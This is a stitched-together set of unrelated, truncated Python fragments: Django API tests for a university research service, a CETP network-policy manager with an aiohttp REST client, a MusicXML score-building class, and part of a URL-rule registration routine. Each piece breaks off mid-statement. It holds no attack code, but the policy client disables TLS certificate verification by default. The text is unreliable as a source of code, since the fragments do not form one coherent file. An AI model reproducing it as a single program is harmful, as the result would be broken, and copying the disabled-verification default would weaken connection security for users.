url = reverse('ricerca:teacherinfo', kwargs={'teacherid': encrypt('111112')})
# check url
res = req.get(url)
assert res.status_code == 200
# GET
res = req.get(url)
assert decrypt(res.json()['results']['TeacherID']) == '111112'
url = reverse('ricerca:teacherinfo', kwargs={'teacherid': encrypt('111113')})
res = req.get(url)
assert res.json()['results']['TeacherFirstName'] == 'Lionel'
class ApiPhdListUnitTest(TestCase):
def test_apiphdlistunittest(self):
req = Client()
dip = DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
'dip_id': 1,
'dip_cod': 1,
'dip_des_it': "Matematica e Informatica",
'dip_des_eng': "Math and Computer Science",
})
cds = DidatticaDottoratoCdsUnitTest.create_didatticaDottoratoCds(**{
'dip_cod': dip,
'cds_id_esse3': 1,
'cds_cod': '111',
'aa_ord_id': 1,
})
DidatticaDottoratoPdsUnitTest.create_didatticaDottoratoPds(**{
'cds_id_esse3': cds,
'aa_ord': cds,
'pds_cod': 'GEN',
})
DidatticaDottoratoRegolamentoUnitTest.create_didatticaDottoratoRegolamento(**{
'regdid_id_esse3': 1,
'cds_id_esse3': cds,
'aa_ord': cds,
'aa_regdid_id': 2020,
'num_ciclo': 10,
})
url = reverse('ricerca:phdlist')
# check url
res = req.get(url)
assert res.status_code == 200
# GET
res = req.get(url)
assert res.json()['results'][0]['PhdCdsCOD'] == '111'
data = {'department': 1}
res = req.get(url, data=data)
assert res.json()['results'][0]['PhdCdsCOD'] == '111'
data = {'year': 2020}
res = req.get(url, data=data)
assert res.json()['results'][0]['PhdCdsCOD'] == '111'
data = {'yearTo': 2019, 'yearFrom': 2018}
res = req.get(url, data=data)
assert len(res.json()['results']) == 0
data = {'yearTo': 2019}
res = req.get(url, data=data)
assert len(res.json()['results']) == 0
data = {'yearFrom': 2018}
res = req.get(url, data=data)
assert len(res.json()['results']) == 1
data = {'regdidid': '111'}
res = req.get(url, data=data)
assert res.json()['results'][0]['PhdCdsCOD'] == '111'
data = {'pdscod': 'GEN'}
res = req.get(url, data=data)
assert res.json()['results'][0]['PhdCdsCOD'] == '111'
data = {'cycle': 0}
res = req.get(url, data=data)
assert len(res.json()['results']) == 0
class ApiDegreeTypesListUnitTest(TestCase):
def test_apidegreetypeslist(self):
req = Client()
dip = DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
'dip_id': 1,
})
DidatticaCdsUnitTest.create_didatticaCds(**{
'dip': dip,
'cds_id': 1,
'tipo_corso_cod': 'L',
'tipo_corso_des': 'Laurea',
'cdsord_id': 1,
})
DidatticaCdsUnitTest.create_didatticaCds(**{
'dip': dip,
'cds_id': 2,
'tipo_corso_cod': 'LM5',
'tipo_corso_des': 'Laurea magistrale ciclo unico',
'cdsord_id': 2,
})
DidatticaCdsUnitTest.create_didatticaCds(**{
'dip': dip,
'cds_id': 3,
'tipo_corso_cod': 'LM',
'tipo_corso_des': 'Laurea Magistrale',
'cdsord_id': 3,
})
DidatticaCdsUnitTest.create_didatticaCds(**{
'dip': dip,
'cds_id': 4,
'tipo_corso_cod': 'L',
'tipo_corso_des': 'Laurea',
'cdsord_id': 4,
})
url = reverse('ricerca:degreetypes')
# check url
res = req.get(url)
assert res.status_code == 200
# GET
res = req.get(url)
assert res.json()['results'][0]['CourseType'] == 'L'
assert len(res.json()['results']) == 3
class ApiDepartmentsListUnitTest(TestCase):
def test_apidepartmentslist(self):
req = Client()
DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
'dip_id': 1,
'dip_cod': '001',
'dip_des_it': 'Dipartimento di Matematica e Informatica',
'dip_des_eng': 'Department of Math and Computer Science',
'dip_nome_breve': 'DEMACS',
})
DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
'dip_id': 2,
'dip_cod': '002',
'dip_des_it': 'Dipartimento di Letteratura',
'dip_des_eng': 'Department of Literature',
'dip_nome_breve': 'LIT',
})
url = reverse('ricerca:departmentslist')
# check url
res = req.get(url)
assert res.status_code == 200
# GET
res = req.get(url)
assert res.json()[
'results'][0]['DepartmentName'] == 'Department of Literature'
data = {'lang': 'it'}
res = req.get(url, data=data)
assert res.json()[
'results'][0]['DepartmentName'] == 'Dipartimento di Letteratura'
class ApiDepartmentDetailUnitTest(TestCase):
def test_apidepartmentdetail(self):
req = Client()
DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
'dip_id': 1,
'dip_cod': '001',
'dip_des_it': 'Dipartimento di Matematica e Informatica',
'dip_des_eng': 'Department of Math and Computer Science',
'dip_nome_breve': 'DEMACS',
})
DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
'dip_id': 2,
'dip_cod': '002',
'dip_des_it': 'Dipartimento di Letteratura',
'dip_des_eng': 'Department of Literature',
'dip_nome_breve': 'LIT',
})
url = reverse(
'ricerca:departmentdetail', kwargs={
'departmentcod': '001'})
# check url
res = req.get(url)
assert res.status_code == 200
# GET
res = req.get(url)
assert res.json()[
'results']['DepartmentName'] == 'Department of Math and Computer Science'
data = {'lang': 'it'}
res = req.get(url, data=data)
assert res.json()[
'results']['DepartmentName'] == 'Dipartimento di Matematica e Informatica'
class ApiAddressbookStructuresListUnitTest(TestCase):
def test_apiaddressbookstructureslist(self):
req = Client()
u1 = UnitaOrganizzativaUnitTest.create_unitaOrganizzativa(**{
'uo': '2',
'uo_padre': '1',
})
u2 = UnitaOrganizzativaUnitTest.create_unitaOrganizzativa(**{
'uo': '3',
'uo_padre': '2',
})
p1 = PersonaleUnitTest.create_personale(**{
'id': 1,
'nome': 'Simone',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'Professore Associato',
'id_ab': 1,
'matricola': '111112',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': u1,
'cod_fis': 'SMN1',
'cv_full_it': 'AAA',
'cv_short_it': 'A',
'cv_full_eng': 'BBB',
'cv_short_eng': 'B',
})
p2 = PersonaleUnitTest.create_personale(**{
'id': 2,
'nome': 'Lionel',
'cognome': 'Messi',
'cd_ruolo': 'AM',
'ds_ruolo_locale': 'Amministrazione',
'id_ab': 2,
'matricola': '111113',
'fl_docente': 0,
'flg_cessato': 0,
'cd_uo_aff_org': u2,
'cod_fis': 'LNL1',
'cv_full_it': 'BBB',
'cv_short_it': 'B',
'cv_full_eng': 'AA',
'cv_short_eng': 'A',
})
PersonaleUnitTest.create_personale(**{
'id': 10,
'nome': 'Simone10',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'Professore Associato',
'id_ab': 10,
'matricola': '111119',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': u1,
'cod_fis': 'SMN10',
})
PersonaleUnitTest.create_personale(**{
'id': 55,
'nome': 'Simone2',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'Professore Associato',
'id_ab': 55,
'matricola': '111166',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': u2,
'cod_fis': 'SMN25',
})
PersonaleUnitTest.create_personale(**{
'id': 13,
'nome': 'Simone13',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'Professore Associato',
'id_ab': 13,
'matricola': '1111145',
'fl_docente': 0,
'flg_cessato': 1,
'cd_uo_aff_org': u1,
'cod_fis': 'SMN13',
})
PersonaleUnitTest.create_personale(**{
'id': 4,
'nome': 'Simone4',
'cognome': 'Mungari',
'cd_ruolo': 'PA',
'ds_ruolo_locale': 'Professore Associato',
'id_ab': 4,
'matricola': '111115',
'fl_docente': 0,
'flg_cessato': 0,
'cd_uo_aff_org': u2,
'cod_fis': 'SMN4',
})
p3 = PersonaleUnitTest.create_personale(**{
'id': 3,
'nome': 'Zlatan',
'cognome': 'Ibra',
'cd_ruolo': 'PO',
'ds_ruolo_locale': 'Professore Ordinario',
'id_ab': 3,
'matricola': '111114',
'fl_docente': 1,
'flg_cessato': 0,
'cd_uo_aff_org': None,
'cod_fis': 'ZLT',
})
DidatticaDipartimentoUnitTest.create_didatticaDipartimento(**{
'dip_id': 1,
'dip_cod': 1,
'dip_des_it': | |
#!/usr/bin/python3.5
"""
BSD 3-Clause License
Copyright (c) 2019, <NAME>, Aalto University, Finland
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import asyncio
import logging
import signal
import socket
import sys
import random
import time
import traceback
import json
import ssl
import cetpManager
import C2CTransaction
import H2HTransaction
import CETPH2H
import CETPC2C
import copy
import aiohttp
LOGLEVEL_PolicyCETP = logging.INFO
LOGLEVEL_PolicyManager = logging.INFO
LOGLEVEL_RESTPolicyClient = logging.INFO
class DPConfigurations(object):
""" To be replaced by actual Class defining the CES Network Interfaces """
def __init__(self, cesid, ces_params=None, name="Interfaces"):
self.cesid = cesid
self._rlocs_config = []
self._payloads_config = {} # Pre-populate with preferences.
self.register_rlocs(ces_params)
self.register_payloads(ces_params)
def register_payloads(self, ces_params):
pref_list = ces_params["payload_preference"]
for typ in pref_list:
self._payloads_config[typ] = pref_list[typ]
def get_payload_preference(self, type):
if type in self._payloads_config:
return self._payloads_config[type]
def register_rlocs(self, ces_params):
rlocs_list = ces_params["rloc_preference"]
for r in rlocs_list:
(pref, ord, typ, val, interface) = r.split(",") # preference, order, rloc_type, address_value, interface_alias
self._rlocs_config.append( (int(pref), int(ord), typ, val, interface) )
def get_rlocs(self, rloc_type=None, iface=None):
""" Returns the list of interfaces defined for an RLOC type """
ret_list = []
for ifaces in self._rlocs_config:
pref, order, r_type, rloc, iface = ifaces
if r_type == rloc_type:
iface_info = (pref, order, rloc, iface)
ret_list.append(iface_info)
return ret_list
def get_registered_rlocs(self):
self._rlocs_config
def get_registered_payloads(self):
self._payloads_config
class PolicyManager(object):
# Loads policies, and keeps policy elements as CETPTLV objects
def __init__(self, l_cesid, cetp_host_policy_file=None, cetp_network_policy_file=None, name="PolicyManager"):
self._cespolicy = {} # key: PolicyCETP()
self._hostpolicy = {} # key: PolicyCETP()
self.name = "PolicyManager"
self.l_cesid = l_cesid
self._logger = logging.getLogger(name)
self.cetp_host_policy_file = cetp_host_policy_file
self.cetp_network_policy_file = cetp_network_policy_file
self._logger.setLevel(LOGLEVEL_PolicyManager) # Within this class, logger will only handle message with this or higher level. (Otherwise, default value of basicConfig() will apply)
self.load_policies()
def load_policies(self):
try:
self._load_CES_policy()
self._load_host_policy()
except Exception as ex:
self._logger.info("Exception in loading policies: {}".format(ex))
return False
def _load_CES_policy(self):
self._logger.info("Loading network-cetp-policies from '{}'".format(self.cetp_network_policy_file))
f = open(self.cetp_network_policy_file)
policy_f = json.load(f)
for policy in policy_f:
if 'type' in policy:
if policy['type'] == "cespolicy":
policy_type, proto, l_cesid, ces_policy = policy['type'], policy['proto'], policy['cesid'], policy['policy']
key = policy_type+":"+proto+":"+l_cesid
#print(key)
p = PolicyCETP(ces_policy)
self._cespolicy[key] = p
def _load_host_policy(self):
self._logger.info("Loading network-cetp-policies from '{}'".format(self.cetp_host_policy_file))
f = open(self.cetp_host_policy_file)
policy_f = json.load(f)
for policy in policy_f:
if 'type' in policy:
if policy['type'] == "hostpolicy":
policy_type, direction, hostid, host_policy = policy['type'], policy['direction'], policy['fqdn'], policy['policy']
key = policy_type +":"+ direction +":"+ hostid
#print("\n\n", key)
p = PolicyCETP(host_policy)
self._hostpolicy[key] = p
def _get_ces_policy(self):
return self._cespolicy
def _get_host_policies(self):
return self._hostpolicies
def get_ces_policy(self, proto=None, cesid=None):
try:
if proto is None or cesid is None:
return
policy_type = "cespolicy"
cesid = cesid
key = policy_type+":"+proto+":"+cesid
policy = self._cespolicy[key]
return copy.deepcopy(policy)
except Exception as ex:
self._logger.error("Exception '{}' in loading policy for '{}'".format(ex, self.l_cesid))
return None
def get_host_policy(self, direction="", host_id=""):
""" The search key for host-policy number 0 is 'policy-0' """
try:
policy_type = "hostpolicy"
key = policy_type +":"+ direction +":"+ host_id
if key in self._hostpolicy:
policy = self._hostpolicy[key]
return policy
except Exception as ex:
self._logger.error("No '{}' policy exists for host_id: '{}'".format(direction, host_id))
return None
# Aiohttp-based PolicyAgent in CES to retrieve CETP policies from Policy Management System
# Leveraging https://stackoverflow.com/questions/37465816/async-with-in-python-3-4
class RESTPolicyClient(object):
def __init__(self, network_policy_url=None, host_policy_url=None, tcp_conn_limit=1, verify_ssl=False, name="RESTPolicyClient"):
self._loop = asyncio.get_event_loop()
self.tcp_conn_limit = tcp_conn_limit
self.verify_ssl = verify_ssl
self.network_policy_url = network_policy_url
self.host_policy_url = host_policy_url
self.policy_cache = {}
self._timeout = 2.0
self.name = name
self._logger = logging.getLogger(name)
self._logger.setLevel(LOGLEVEL_RESTPolicyClient)
self._logger.info("Initiating RESTPolicyClient towards Policy Management System ")
self._connect()
def _connect(self):
try:
tcp_conn = aiohttp.TCPConnector(limit=self.tcp_conn_limit, loop=self._loop, verify_ssl=self.verify_ssl, keepalive_timeout=30)
self.client_session = aiohttp.ClientSession(connector=tcp_conn)
except Exception as ex:
self._logger.error("Failure initiating the rest policy client")
self._logger.error(ex)
def close(self):
self.client_session.close()
def cache_policy(self, key, policy):
self.policy_cache[key] = policy
def _adjust_host_policy_key_word(self, direction):
""" For some strange reasons, Hassaan's developed SPM uses words 'EGRESS' in place for 'outbound', and 'INGRESS' for 'inbound' direction """
if direction == "outbound": direction = "EGRESS"
elif direction == "inbound": direction = "INGRESS"
else: direction = None
return direction
@asyncio.coroutine
def get_host_policy(self, host_id=None, direction=None, timeout=2.0):
""" Initiates host-policy query towards SPM """
try:
if self.host_policy_url is None:
return
if (host_id is None) or (direction is None):
return
direction = self._adjust_host_policy_key_word(direction)
params = {'lfqdn': host_id, 'direction': direction}
resp = yield from self.get(self.host_policy_url, params=params, timeout=timeout)
json_policy = json.loads(resp)
host_policy = PolicyCETP(json_policy)
return host_policy
except Exception as ex:
self._logger.error("Exception '{}' in processing the policy response".format(ex))
return
@asyncio.coroutine
def get_ces_policy(self, cesid=None, proto=None, timeout=2.0):
""" Initiates host-policy query towards SPM """
try:
if self.network_policy_url is None:
return
if (proto is None) or (cesid is None):
return
params = {'ces_id': cesid, 'protocol': proto}
resp = yield from self.get(self.network_policy_url, params=params, timeout=timeout)
json_policy = json.loads(resp)
ces_policy = PolicyCETP(json_policy)
return ces_policy
except Exception as ex:
self._logger.error("Exception '{}' in processing the policy response".format(ex))
return
@asyncio.coroutine
def get(self, url, params=None, timeout=None):
if timeout is None:
timeout = self._timeout
with aiohttp.Timeout(timeout):
resp = None # To handles issues related to connectivity with url
try:
resp = yield from self.client_session.get(url, params=params)
if resp.status == 200:
policy_response = yield from resp.text()
#print(policy_response)
return policy_response
else:
return None
except Exception as ex:
# .close() on exception.
if resp!=None:
resp.close()
self._logger.error("Exception '{}' in getting REST policy response".format(ex))
finally:
if resp!=None:
yield from resp.release() # .release() - returns connection into free connection pool.
@asyncio.coroutine
def delete(self, url, timeout=None):
if timeout is None:
timeout = self._timeout
with aiohttp.Timeout(timeout):
resp = yield from self.client_session.delete(url)
try:
return (yield from resp.text())
except Exception as ex:
resp.close()
raise ex
finally:
yield from resp.release()
class PolicyCETP(object):
def __init__(self, policy, name="PolicyCETP"):
self.policy = policy
self._logger = logging.getLogger(name)
self._logger.setLevel(LOGLEVEL_PolicyCETP) # Within this class, logger will only handle message with this or higher level. (Otherwise, default value of basicConfig() will apply)
self._initialize()
def __copy__(self):
self._logger.debug("Shallow copying the python policy object.")
return PolicyCETP(self.policy)
def __deepcopy__(self, memo):
"""
To copy the policy object by value.. Deepcopy() is useful for compound objects (that contain other objects, like lists or class instances in them)
Reference implementation: https://pymotw.com/2/copy/
"""
self._logger.debug("Deep copying the python policy object.")
not_there = []
existing = memo.get(self, not_there)
if existing is not not_there:
return existing
dup = PolicyCETP(copy.deepcopy(self.policy, memo))
memo[self] = dup
return dup
def _initialize(self):
if "request" in self.policy:
self.required = self.policy["request"]
if "offer" in self.policy:
self.offer = self.policy["offer"]
if "available" in self.policy:
self.available = self.policy["available"]
# setting value for CETP can be handled in CETP transaction module
def get_available_policy(self, tlv):
ret = self.get_tlv_details(tlv)
i_ope, i_cmp, i_group, i_code, i_value = ret
found = False
for rtlv in self.available:
if rtlv["group"] == i_group and rtlv["code"]== i_code:
found = True
a_ope, a_cmp, a_group, a_code, a_value = self.get_tlv_details(rtlv)
return a_ope, a_cmp, a_group, a_code, a_value
if not found:
return None
def get_policy_to_enforce(self, tlv):
ope, cmp, group, code, value = self.get_tlv_details(tlv)
for rtlv in self.required:
if (rtlv["group"] == tlv["group"]) and (rtlv["code"]==tlv["code"]):
ope, cmp, group, code, value = self.get_tlv_details(rtlv)
return ope, cmp, group, code, value
def get_tlv_details(self, tlv):
ope, cmp, | |
from lxml import etree as et
import musicscore.musicxml.elements.timewise as timewise
from musicscore.musictree.treechord import TreeChord
from musicscore.musictree.treeinstruments import TreeInstrument
from musicscore.musictree.treemeasure import TreeMeasure
from musicscore.musictree.treepagestyle import TreePageStyle
from musicscore.musictree.treepart import TreePart
from musicscore.musictree.treescorepart import TreeScorePart
from musicscore.musicxml.elements import partwise
from musicscore.musicxml.elements.barline import Barline, BarStyle
from musicscore.musicxml.elements.scoreheader import PartList, Credit, Defaults
from musicscore.musicxml.types.complextypes.appearance import LineWidth
from musicscore.musicxml.types.complextypes.credit import CreditType, CreditWords
from musicscore.musicxml.types.complextypes.defaults import Appearance, WordFont
from musicscore.musicxml.types.complextypes.encoding import Supports
from musicscore.musicxml.types.complextypes.identification import Encoding
from musicscore.musicxml.types.complextypes.scorepart import Identification
class TreeScoreTimewise(timewise.Score):
""""""
_auto_part_number = 1
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._part_list = self.add_child(PartList())
self.version = '3.0'
self._tuplet_line_width = None
self._finished = False
self._pre_quantized = False
self._quantized = False
self._post_quantized = False
self._max_division = None
self._forbidden_divisions = None
self._page_style = TreePageStyle(score=self, **kwargs)
self._accidental_mode = 'normal'
self._break_beam_32 = False
self._title = None
self._subtitle = None
self._composer = None
self._page_number = None
self._identifications_added = False
# private methods
def _add_identifications(self):
identification = self.add_child(Identification())
encoding = identification.add_child(Encoding())
encoding.add_child(Supports(attribute='new-page', element='print', type_='yes', value_='yes'))
encoding.add_child(Supports(attribute='new-system', element='print', type_='yes', value_='yes'))
self._identifications_added = True
def _generate_score_part(self):
id_ = 'p' + str(self._auto_part_number)
self._auto_part_number += 1
return TreeScorePart(id=id_)
def _set_new_measure(self, measure):
if measure is None:
new_measure = TreeMeasure()
measures = self.get_children_by_type(TreeMeasure)
if measures:
new_measure.time = measures[-1].time.__copy__()
else:
new_measure.time.show = True
else:
new_measure = measure
return new_measure
# public properties
@property
def accidental_mode(self):
return self._accidental_mode
@accidental_mode.setter
def accidental_mode(self, value):
self._accidental_mode = value
@property
def break_beam_32(self):
return self._break_beam_32
@break_beam_32.setter
def break_beam_32(self, value):
if not isinstance(value, bool):
raise TypeError(f'Score().break_beam_32 {value} must be boolean.')
self._break_beam_32 = value
@property
def composer(self):
return self._composer
@property
def defaults(self):
try:
return self.get_children_by_type(Defaults)[0]
except IndexError:
return None
@property
def forbidden_divisions(self):
return self._forbidden_divisions
@forbidden_divisions.setter
def forbidden_divisions(self, value):
if value is not None:
for x in value:
if not isinstance(x, int):
raise TypeError('forbidden_division must be of type int not{}'.format(type(value)))
self._forbidden_divisions = value
def make_defaults(self):
if self.defaults is None:
self.add_child(Defaults())
else:
raise Exception('defaults already exists')
@property
def max_division(self):
return self._max_division
@max_division.setter
def max_division(self, value):
if value is not None and not isinstance(value, int):
raise TypeError('max_division.value must be None or of type int not {}'.format(type(value)))
self._max_division = value
@property
def number_of_parts(self):
return len(self._part_list.get_children_by_type(TreeScorePart))
@property
def page_style(self):
return self._page_style
@property
def subtitle(self):
return self._subtitle
@property
def title(self):
return self._title
@property
def tuplet_line_width(self):
return self._tuplet_line_width
@tuplet_line_width.setter
def tuplet_line_width(self, val):
if not isinstance(val, float):
raise TypeError('tuplet_line_width.value must be of type float not{}'.format(type(val)))
self._tuplet_line_width = val
if self.defaults is None:
self.make_defaults()
try:
appearance = self.defaults.get_children_by_type(Appearance)[0]
except IndexError:
appearance = self.defaults.add_child(Appearance())
try:
line_width = [lw for lw in appearance.get_children_by_type(LineWidth) if lw.type == 'tuplet bracket'][0]
except IndexError:
line_width = appearance.add_child(LineWidth(type='tuplet bracket'))
line_width.value = val
@property
def word_font(self):
try:
return self.defaults.get_children_by_type(WordFont)[0]
except (AttributeError, IndexError):
return None
# public methods
# add
def add_beats(self, list_of_beats=None):
for measure in self.get_children_by_type(TreeMeasure):
for part in measure.get_children_by_type(TreePart):
part.add_beats(list_of_beats)
def add_chord(self, measure_number, part_number, chord):
if not isinstance(chord, TreeChord):
raise TypeError('add_note note must be of type TreeChord not {}'.format(type(chord)))
measure = self.get_children_by_type(TreeMeasure)[measure_number - 1]
part = measure.get_children_by_type(TreePart)[part_number - 1]
part.add_chord(chord)
return chord
def add_composer(self, text, page=None, font_size=None, default_x=None, default_y=None, justify=None, valign=None,
**kwargs):
if not page:
page = 1
if not font_size:
font_size = 12
if not default_x:
default_x = int(self.page_style.page_width.value - 50)
if not default_y:
default_y = self.page_style.page_height.value - 143
if not justify:
justify = 'right'
if not valign:
valign = 'top'
c = self.add_child(Credit(page=page))
c.add_child(CreditType('composer'))
self._composer = c.add_child(
CreditWords(text, default_x=default_x, default_y=default_y, font_size=font_size, justify=justify,
valign=valign, **kwargs))
def add_measure(self, measure=None):
new_measure = self._set_new_measure(measure)
for score_part in self.get_score_parts():
p = score_part.add_part()
new_measure.add_child(p)
return self.add_child(new_measure)
def add_part(self, instrument=None):
new_score_part = self._generate_score_part()
new_score_part.instrument = instrument
self.add_score_part(new_score_part)
for measure in self.get_children_by_type(TreeMeasure):
part = new_score_part.add_part()
measure.add_child(part)
if measure.barline_style:
bl = part.add_child(Barline())
bl.add_child(BarStyle(measure.barline_style))
def add_page_number(self, page=1, font_size=12, default_x=None, default_y=None, valign='top',
halign=None, **kwargs):
w = self.page_style.page_width.value
h = self.page_style.page_height.value
if not default_x:
if page % 2 == 0:
default_x = int(w / 20)
else:
default_x = w - int(w / 20)
if not default_y:
default_y = h - int(h / 30)
if not halign:
if page % 2 == 0:
halign = 'left'
else:
halign = 'right'
c = self.add_child(Credit(page=page))
c.add_child(CreditType('page number'))
self._page_number = c.add_child(
CreditWords(str(page), default_x=default_x, default_y=default_y, font_size=font_size,
valign=valign, halign=halign, **kwargs))
def add_text(self, text, page=None, font_size=None, default_x=None, default_y=None, justify=None, valign=None,
**kwargs):
if not page:
page = 1
if not font_size:
font_size = 12
if not default_x:
default_x = 50
if not default_y:
default_y = self.page_style.page_height.value - 143
if not justify:
justify = 'left'
if not valign:
valign = 'top'
c = self.add_child(Credit(page=page))
self._title = c.add_child(
CreditWords(text, default_x=default_x, default_y=default_y, font_size=font_size, justify=justify,
valign=valign, **kwargs))
def add_title(self, text, page=None, font_size=None, default_x=None, default_y=None, justify=None, valign=None,
**kwargs):
if not page:
page = 1
if not font_size:
font_size = 24
if not default_x:
default_x = int(self.page_style.page_width.value / 2)
if not default_y:
default_y = self.page_style.page_height.value - 43
if not justify:
justify = 'center'
if not valign:
valign = 'top'
c = self.add_child(Credit(page=page))
c.add_child(CreditType('title'))
self._title = c.add_child(
CreditWords(text, default_x=default_x, default_y=default_y, font_size=font_size, justify=justify,
valign=valign, **kwargs))
def add_score_part(self, score_part):
score_part.parent_score = self
return self._part_list.add_child(score_part)
def add_subtitle(self, text, page=None, font_size=None, default_x=None, default_y=None, justify=None, valign=None,
**kwargs):
if not page:
page = 1
if not font_size:
font_size = 18
if not default_x:
default_x = int(self.page_style.page_width.value / 2)
if not default_y:
default_y = self.page_style.page_height.value - 93
if not justify:
justify = 'center'
if not valign:
valign = 'top'
c = self.add_child(Credit(page=page))
c.add_child(CreditType('subtitle'))
self._subtitle = c.add_child(
CreditWords(text, default_x=default_x, default_y=default_y, font_size=font_size, justify=justify,
valign=valign, **kwargs))
def add_instrument(self, instrument):
if not isinstance(instrument, TreeInstrument):
raise TypeError()
self.add_part(instrument=instrument)
def add_word_font(self, **kwargs):
if self.defaults is None:
self.make_defaults()
self.defaults
# get
def get_beats(self):
output = []
for measure in self.get_children_by_type(TreeMeasure):
output.extend(measure.get_beats())
return output
def get_measure(self, number):
if number == 0:
raise ValueError('number can be positiv or negative integer but not 0')
if number < 0:
number += 1
return self.get_children_by_type(TreeMeasure)[number - 1]
def get_score_part(self, id):
for score_part in self.get_score_parts():
if score_part.id == id:
return score_part
return None
def get_score_parts(self):
return self._part_list.get_children_by_type(TreeScorePart)
# remove
def remove_subtitle(self):
subtitle_credit = [c for c in self.get_children_by_type(Credit) if
c.get_children_by_type(CreditType)[0].value == 'subtitle']
try:
self.remove_child(subtitle_credit[0])
except IndexError:
pass
def remove_title(self):
title_credit = [c for c in self.get_children_by_type(Credit) if
c.get_children_by_type(CreditType)[0].value == 'title']
try:
self.remove_child(title_credit[0])
except IndexError:
pass
# set
def set_time_signatures(self, quarter_durations=None, times=None, barline_style=None):
global current_time
if self.get_children_by_type(TreeMeasure):
raise Exception('for setting time signatures score should be empty')
def make_measure(duration=None):
def get_time():
if duration % 1 == 0:
time = (int(duration), 4)
return time
elif (duration * 2) % 1 == 0:
time = (int(duration * 2), 8)
return time
else:
raise ValueError('duration {} is not dividable'.format(duration))
if not duration:
time = (4, 4)
else:
time = get_time()
return TreeMeasure(time)
if not times:
times = {}
current_time = (4, 4)
def set_times(current_measure_number, duration):
global current_time
duration = float(duration)
remaining_duration = duration
while True:
if current_measure_number in times.keys():
current_time = times[current_measure_number]
measure = TreeMeasure(time=current_time)
measure_duration = measure.quarter_duration
if measure_duration > remaining_duration:
measure = make_measure(duration=remaining_duration)
self.add_measure(measure)
break
else:
self.add_measure(measure)
current_measure_number += 1
remaining_duration -= measure.quarter_duration
if remaining_duration == 0:
break
if barline_style:
self.get_children_by_type(TreeMeasure)[-1].set_barline_style(barline_style)
return current_measure_number
if quarter_durations:
if not hasattr(quarter_durations, '__iter__'):
quarter_durations = [quarter_durations]
elif isinstance(quarter_durations, str):
raise TypeError()
else:
quarter_durations = quarter_durations
current_measure_number = 1
for duration in quarter_durations:
current_measure_number = set_times(current_measure_number, duration)
if list(times.keys()) != [] and current_measure_number < list(times.keys())[-1]:
current_time = (4, 4)
for key in times.keys():
if key <= current_measure_number:
current_time = times[key]
for measure_number in range(current_measure_number, list(times.keys())[-1] + 1):
try:
current_time = times[measure_number]
except KeyError:
pass
self.add_measure(TreeMeasure(time=current_time))
else:
try:
number_of_measures = list(times.keys())[-1]
current_time = (4, 4)
for measure_number in range(1, number_of_measures + 1):
try:
current_time = times[measure_number]
except KeyError:
pass
self.add_measure(TreeMeasure(time=current_time))
except IndexError:
pass
# update
def update_accidentals(self, mode='normal'):
for measure in self.get_children_by_type(TreeMeasure):
for part in measure.get_children_by_type(TreePart):
part.update_accidentals(mode=mode)
def update_divisions(self):
for measure in self.get_children_by_type(TreeMeasure):
for part in measure.get_children_by_type(TreePart):
part.update_divisions()
def update_dots(self):
for measure in self.get_children_by_type(TreeMeasure):
for part in measure.get_children_by_type(TreePart):
part.update_dots()
def update_durations(self):
for measure in self.get_children_by_type(TreeMeasure):
for part in measure.get_children_by_type(TreePart):
part.update_durations()
def update_measures(self):
measures = self.get_children_by_type(TreeMeasure)
for index, measure in enumerate(measures):
measure.number = str(index + 1)
if measure.time.force_hide:
measure.hide_time_signature()
elif measure.time.force_show:
measure.show_time_signature()
elif index == 0:
measure.show_time_signature()
elif measure.time.values == measures[index - 1].time.values:
measure.hide_time_signature()
else:
measure.show_time_signature()
def update_tuplets(self):
for measure in self.get_children_by_type(TreeMeasure):
for part in measure.get_children_by_type(TreePart):
part.update_tuplets()
def update_types(self):
for measure in self.get_children_by_type(TreeMeasure):
for | |
provide_automatic_options = getattr(
view_func, 'provide_automatic_options', None
)
if provide_automatic_options is None:
provide_automatic_options = True
else:
if not isinstance(provide_automatic_options, bool):
raise TypeError(
f'`provide_automatic_options` can be given either as `None` or `bool` instance, got '
f'{provide_automatic_options.__class__.__name__}.`'
)
if endpoint is None:
if isinstance(view_func, (Rule, RuleFolder)):
endpoint = view_func.endpoint
else:
try:
endpoint = view_func.__name__
except AttributeError:
endpoint = view_func.__class__.__name__
if type(endpoint) is str:
pass
elif isinstance(endpoint, str):
